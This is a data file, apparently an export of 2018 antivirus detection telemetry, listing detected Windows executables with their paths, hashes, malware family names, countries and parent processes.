  Row(detection=Row(filename='spinstall.exe', filepath='G:\\SPDMTK FILES\\Lenovo\\Lenovo_A606_S039_150604_ROW_(by_firmwarefile.com)\\Lenovo_A606_S039_150604_ROW\\Driver\\Auto Installer Driver v1.1236.00\\SmartPhoneDriver\\x86\\spinstall.exe', filesize=640000, name='W32/Sality.AG.#M1.#R1'), hash='26a1024a60ce7cd98daedd9eb498992487bb68d14863353108f6eded6ad73c7a', metadata=Row(cmdline='\\\\\\/onboot', country='DK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WWW.HOSTJSC.NET\\Internet Download Manager\\IDMan.exe', parentsize=990720, timestamp='2018-11-02T04:05:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='spinstall.exe', filepath='G:\\SPDMTK FILES\\Lenovo\\Lenovo_A606_S039_150604_ROW_(by_firmwarefile.com)\\Lenovo_A606_S039_150604_ROW\\Driver\\Auto Installer Driver v1.1236.00\\SmartPhoneDriver\\x86\\spinstall.exe', filesize=640000, name='W32/Sality.AG.#M1.#R1'), hash='26a1024a60ce7cd98daedd9eb498992487bb68d14863353108f6eded6ad73c7a', metadata=Row(cmdline=None, country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\BlueStacks\\HD-Network.exe', parentsize=451800, timestamp='2018-11-02T04:05:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='273878b53a23dedfba9510ba5363c43b97211bee5d8ebf79ff506ff0691e98a4.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-21.available\\Avira\\273878B53A23DEDFBA9510BA5363C43B97211BEE5D8EBF79FF506FF0691E98A4.VIR', filesize=448000, name='HEUR/AGEN.1014473.#M1.#R1'), hash='273878b53a23dedfba9510ba5363c43b97211bee5d8ebf79ff506ff0691e98a4', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T10:42:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe755_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe755 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T06:34:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe436_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe436 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:37:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe489_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe489 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T16:02:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe358_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe358 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T12:43:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe858_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe858 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T13:47:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe192_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe192 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T04:31:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe149_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe149 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T10:40:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe191_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe191 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T23:44:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe185_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe185 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T20:03:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe992_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe992 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T17:14:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe294_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe294 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T09:39:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe492_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe492 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T21:15:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe136_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe136 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T19:00:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe594_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe594 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T07:36:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe985_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe985 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T03:31:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe567_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe567 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T14:47:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe2_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe2 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T17:48:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe869_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe869 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T05:33:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe297_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe297 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T00:55:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe598_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe598 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T22:19:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe667_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe667 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T11:42:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ai.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL14\\AI\\AI.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='27e946580ebd3a67750c862d3cce6b9573f1e3e495ebccfe9a67f563208fdf59', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='graphs.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL14\\GRAPHS\\GRAPHS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='27e946580ebd3a67750c862d3cce6b9573f1e3e495ebccfe9a67f563208fdf59', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='level14.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL14\\LEVEL14.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='27e946580ebd3a67750c862d3cce6b9573f1e3e495ebccfe9a67f563208fdf59', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:32Z'), dt=datetime.date(2018, 11, 2)),
